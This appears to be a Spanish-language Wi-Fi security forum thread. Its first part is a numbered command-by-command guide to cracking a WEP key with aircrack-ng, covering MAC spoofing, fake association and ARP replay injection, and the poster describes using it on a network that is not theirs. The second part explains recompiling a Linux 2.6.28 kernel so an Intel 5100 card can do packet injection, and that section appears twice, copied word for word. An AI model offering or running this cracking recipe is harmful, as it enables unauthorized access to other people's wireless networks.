este hilo, he puesto by Jaco, Bht Sata y Dexter Back... si me dejo a alguien en el tintero... pido disculpas (y enviadme un IM)

--------------------------------------------------
Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX.

Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:
Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto: aircrack-ng -z *.cap así me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.
En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:
-------------------------------------------------------------------------------------------------------------------------------
1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a crackear, y copio en un .txt aparte toda la info.
2º airmon-ng start wlan0 CHANNEL
3º Creo el wpa.conf
Código:
network={
ssid="ESSID"
key_mgmt=NONE
bssid=BSSID
wep_key0="232323343478787"
}
3º ifconfig wlan0 down
4º macchanger -m 00:11:22:33:44:55 wlan0
5º ifconfig wlan0 up
6º wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0

Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.
7º airodump-ng -w dexter-back -c CHANNEL mon0

8º aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0

9º aircrack-ng -z *.cap
10º KEY FOUND!

NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar.
EDITO: ipw5100 Para LiveUsb prueba ésto http://rapidshare.com/files/254366743/Actualizar_Kernel_Wifiway.rar
EDITO: ipw5100 http://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/intel(r)-wireless-wifi-link-5100-y-wifiway-1-0-final/msg105453/#msg105453
Por lo que parece somos aún pocos los que poseemos una 5100 o quizá la gente esté a la espera de ver un poco de luz.
Por mi trabajo me paso casi toda la semana fuera de casa y dispongo de poco tiempo para estos menesteres. Pero vamos a ver si entre todos ponemos a andar ésta tarjeta con la magnífica Wifiway 1.0.
Si en algún momento infrinjo las normas o éste post no entra dentro de la filosofía "SEGURIDAD WIRELESS", espero que los administadores lo borren o editen.
Bueno basta ya de rollos, éstos son mis avances:
Inyección conseguida 100%, asociación, etc.. ( a falta de confirmar ataque de fragmentación), el chop-chop me dá la sensación de ralentizar el ordenador y tardar un poco más que con mi ex IPW3945 y el peazo "AIROWAY".
Ahora os diré como tengo montado el tenderete
:
- Instalación completa en llave USB 8GB
- Actualización Aircrack, mediante Wifipacket
- Y lo más engorroso (aunque para mí mas entretenido), Kernel actualizado 2.6.28
De la manera que lo he actualizado no se si será la manera correcta o no pero yo lo he hecho así:
+ Bajar el último kernel estable 2.6.28 de http://www.kernel.org/
+ Descomprimimos en usr/src/
+ Lo menos ortodoxo (para vagos), en el explorador de archivos marcamos la opción para ver los archivos ocultos y nos vamos al directorio usr/src/linux-2.6.27.7 y copiamos el archivo .config a la carpeta donde hemos descomprimido el kernel, usr/src/linux-2.6.28.
+ Abrimos una consola y nos vamos a éste directorio. cd /usr/src/linux-2.6.28
+ Escribimos make xconfig
+ Empieza la configuración de kernel. Revisamos los diferentes apartados, procurando dejar todo más o menos como está y preocupandonos de que los driver de nuestra 5100 estén activados.
+ Cuando acabemos guardamos y salimos. En la consola escribimos "make"
+ Tardará un buen rato, cuando acabe escribimos "make modules" y
luego "make modules_install"
+ nos vamos al directorio usr/src/linux-2.6.28/arch/i386/boot y escribimos
"cp bzImage /boot/vmlinuz-2.6.28"
+ Nos dirigimos a /boot/grub y editamos el fichero menu.lst para añadir las siguientes entradas para poder arrancar con este kernel
title wifiway 2.6.28
root (hd0,0)
kernel /boot/vmlinuz-2.6.28 root=/dev/sdb1 ro vga=791
initrd /boot/initrd.gz
savedefault
(me baso en mi configuración, en vuestro caso puede variar un poco)
y de paso ponemos
timeout 10
+ Guardamos el archivo y reiniciamos para probar.
+ Ahora deberíamos tener dos opciones para arrancar, Wifiway 1.0 y Wifiway 2.6.28
Lo siguiente lo dejo en vuestras manos.
Espero que ésto no os sea un rollazo, pero la verdad las pruebas que había realizado con el Wifiway 1.0 sin toquetear (no demasiadas pruebas por cierto) no dieron su fruto. Así que animaros y sobre todo contar vuestros avances y dudas sin miedo.
Por cierto me quedaría contaros mi odisea para la instalación completa en una llave usb, pero eso es para otro día. Solo deciros que gracias a HWAGM y otros colaboradores tengo un tesoro guardado en un diminuto pendrive.
Asi que si algun compañero quiere actualizar este kernel,( ojo teniendo instalado wifiway en el disco duro) seguir todos los pasos que indica kamiteo, solo añadiendo al menu.lst:
title wifiway 2.6.28
root (hd0,0)
kernel /boot/vmlinuz-2.6.28 root=/dev/xdxx ro vga=791
savedefault
boot
Por mi trabajo me paso casi toda la semana fuera de casa y dispongo de poco tiempo para estos menesteres. Pero vamos a ver si entre todos ponemos a andar ésta tarjeta con la magnífica Wifiway 1.0.
Si en algún momento infrinjo las normas o éste post no entra dentro de la filosofía "SEGURIDAD WIRELESS", espero que los administadores lo borren o editen.
Bueno basta ya de rollos, éstos son mis avances:
Inyección conseguida 100%, asociación, etc.. ( a falta de confirmar ataque de fragmentación), el chop-chop me dá la sensación de ralentizar el ordenador y tardar un poco más que con mi ex IPW3945 y el peazo "AIROWAY".
Ahora os diré como tengo montado el tenderete
:- Instalación completa en llave USB 8GB
- Actualización Aircrack, mediante Wifipacket
- Y lo más engorroso (aunque para mí mas entretenido), Kernel actualizado 2.6.28
De la manera que lo he actualizado no se si será la manera correcta o no pero yo lo he hecho así:
+ Bajar el último kernel estable 2.6.28 de http://www.kernel.org/
+ Descomprimimos en usr/src/
+ Lo menos ortodoxo (para vagos), en el explorador de archivos marcamos la opción para ver los archivos ocultos y nos vamos al directorio usr/src/linux-2.6.27.7 y copiamos el archivo .config a la carpeta donde hemos descomprimido el kernel, usr/src/linux-2.6.28.
+ Abrimos una consola y nos vamos a éste directorio. cd /usr/src/linux-2.6.28
+ Escribimos make xconfig
+ Empieza la configuración de kernel. Revisamos los diferentes apartados, procurando dejar todo más o menos como está y preocupandonos de que los driver de nuestra 5100 estén activados.
+ Cuando acabemos guardamos y salimos. En la consola escribimos "make"
+ Tardará un buen rato, cuando acabe escribimos "make modules" y
luego "make modules_install"
+ nos vamos al directorio usr/src/linux-2.6.28/arch/i386/boot y escribimos
"cp bzImage /boot/vmlinuz-2.6.28"
+ Nos dirigimos a /boot/grub y editamos el fichero menu.lst para añadir las siguientes entradas para poder arrancar con este kernel
title wifiway 2.6.28
root (hd0,0)
kernel /boot/vmlinuz-2.6.28 root=/dev/sdb1 ro vga=791
initrd /boot/initrd.gz
savedefault
(me baso en mi configuración, en vuestro caso puede variar un poco)
y de paso ponemos
timeout 10
+ Guardamos el archivo y reiniciamos para probar.

+ Ahora deberíamos tener dos opciones para arrancar, Wifiway 1.0 y Wifiway 2.6.28
Lo siguiente lo dejo en vuestras manos.
Espero que ésto no os sea un rollazo, pero la verdad las pruebas que había realizado con el Wifiway 1.0 sin toquetear (no demasiadas pruebas por cierto) no dieron su fruto. Así que animaros y sobre todo contar vuestros avances y dudas sin miedo.
Por cierto me quedaría contaros mi odisea para la instalación completa en una llave usb, pero eso es para otro día. Solo deciros que gracias a HWAGM y otros colaboradores tengo un tesoro guardado en un diminuto pendrive.
Asi que si algun compañero quiere actualizar este kernel,( ojo teniendo instalado wifiway en el disco duro) seguir todos los pasos que indica kamiteo, solo añadiendo al menu.lst:
title wifiway 2.6.28
root (hd0,0)
kernel /boot/vmlinuz-2.6.28 root=/dev/xdxx ro vga=791
savedefault
boot

Autor